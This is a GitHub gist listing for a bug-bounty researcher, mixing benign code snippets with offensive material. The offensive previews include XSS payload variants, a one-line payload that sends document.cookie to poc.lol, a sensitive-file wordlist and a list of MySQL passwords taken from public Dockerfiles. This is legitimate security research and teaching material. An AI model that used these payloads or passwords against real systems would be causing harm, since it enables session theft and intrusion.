Skip to content

Instantly share code, notes, and snippets.

View tomnomnom's full-sized avatar
☺️
Taking it easy

Tom Hudson tomnomnom

☺️
Taking it easy
View GitHub Profile
@tomnomnom
tomnomnom / alert.js
Last active March 22, 2024 13:42
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@tomnomnom
tomnomnom / simple-json-api.go
Created December 20, 2014 16:34
Simple JSON API Server in Go
package main
import (
"encoding/json"
"fmt"
"log"
"net/http"
)
// The `json:"whatever"` bit is a way to tell the JSON
@tomnomnom
tomnomnom / short-wordlist.txt
Created September 29, 2019 19:44
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
@tomnomnom
tomnomnom / simple-mvc.php
Created June 18, 2012 13:51
Very Simple MVC
<?php
// "M"
function getUsers(){
// Fetch from DB
// ...
return $arrayOfUsers;
}
// "C"
$users = array();
@tomnomnom
tomnomnom / fetch-call-template.js
Created May 4, 2023 11:37
Calling fetch to leak cookies with template strings / no parens
Reflect.apply.call`${fetch}${window}${['https://poc.lol/?'+document.cookie]}`
@tomnomnom
tomnomnom / ctf-from-hell.md
Last active July 30, 2023 10:15
The CTF from \u000aHELL

The CTF from \u000aHELL

Chapter 1

IT WAS A DARK AND STORMY^w^w^w^w^w^wIt was a bright and sunny Tuesday afternoon. Tom had just arrived back at the office after a trip to down south. He'd been to a dinner in London; helping HackerOne give new and prospective customers advice on their bug bounty programs.

With the few emails he'd received responded to: he span in his chair, sipping at his coffee, wondering how to best to limber up his brain into 'work mode' after a night of free drinks. His aging neurons creaked and

@tomnomnom
tomnomnom / how-much-does-your-branch-suck.sh
Created April 21, 2016 11:38
Find out how much your branch sucks
#!/bin/bash
set -e
BRANCH=${1}
if [ -z "${BRANCH}" ]; then
echo "Usage: ${0} <branch>"
exit 1
fi
@tomnomnom
tomnomnom / php-curl-crlf-injection.mkd
Last active February 27, 2023 20:19
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@tomnomnom
tomnomnom / passwords.txt
Last active February 25, 2023 20:34
MySQL Docker Passwords pulled from Dockerfile and docker-compose.yml files
0Z0mQ130F65E8wD
1QAZXsw2
3dodPaTXF5
5E84F90
5aQNxsB58752fNl
5ciuk1sy
5zkfAr9Y8k6qosP
8PuNNgp9wm2w
9Lug*96q
14mR00t
@tomnomnom
tomnomnom / convert-mp4-to-gif.mkd
Last active December 4, 2022 09:59
Crop an mp4 and convert it to a gif

Because I'll forget how to do this...

Crop

crop=w:h:x:y

ffmpeg -i in.mp4 -filter:v "crop=900:700:0:50" out.mp4